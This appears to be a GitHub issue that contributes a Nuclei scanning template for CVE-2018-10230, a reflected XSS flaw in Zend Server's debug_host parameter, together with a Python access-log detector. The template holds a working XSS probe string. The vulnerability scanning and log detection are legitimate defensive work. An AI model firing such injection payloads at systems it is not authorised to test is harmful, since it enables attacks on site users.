CVE-2018-10230
rohsec opened this issue
Rohit commented
Template Information:
Cross-site scripting in sites using ZendServer < 9.13 via the "debug_host" parameter
Nuclei Template:
id: CVE-2018-10230

info:
  name: Zend Server <9.13 XSS
  author: marcos_iaf
  severity: medium
  description: A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter.
  reference: https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf
  tags: xss,zend,php

requests:
  - method: GET
    path:
      # Harmless <u> marker placed in debug_host to test for reflection
      - "{{BaseURL}}/index.php?debug_host=\"><u>tester</u>&start_debug=1"

    # Both matchers must hold: marker reflected unencoded and a 200 response
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<u>tester</u>"
        part: body

      - type: status
        status:
          - 200
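
A log-side check for the parameter the template probes, as an added example that is not part of the original issue or the nuclei-templates project: it flags access-log requests whose debug_host value decodes to HTML metacharacters. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Characters that let a reflected value break out of an HTML attribute or tag.
HTML_META = re.compile(r'[<>"\']')
# Request target inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are inspected too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_debug_host(log_line):
    """Return decoded debug_host values in one log line that carry markup."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    # parse_qs already decodes once; fully_decode handles further layers.
    values = parse_qs(query, keep_blank_values=True).get("debug_host", [])
    decoded = [fully_decode(v) for v in values]
    return [v for v in decoded if HTML_META.search(v)]


def scan(lines):
    """Return (line_number, value) pairs for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        hits.extend((number, v) for v in suspicious_debug_host(line))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2018:10:00:01 +0000] "GET /index.php?debug_host=10.0.0.7&start_debug=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/May/2018:10:00:02 +0000] "GET /index.php?debug_host=%22%3E%3Cu%3Etester%3C%2Fu%3E&start_debug=1 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/May/2018:10:00:03 +0000] "GET /about.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: debug_host carries markup: {value!r}")
```

A plain host or IP address in debug_host is not flagged; only values that decode to `<`, `>` or quote characters are reported.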
Prince Chaddha commented
Hello @720922, thank you so much for sharing this template with the community and contributing to this project 🍻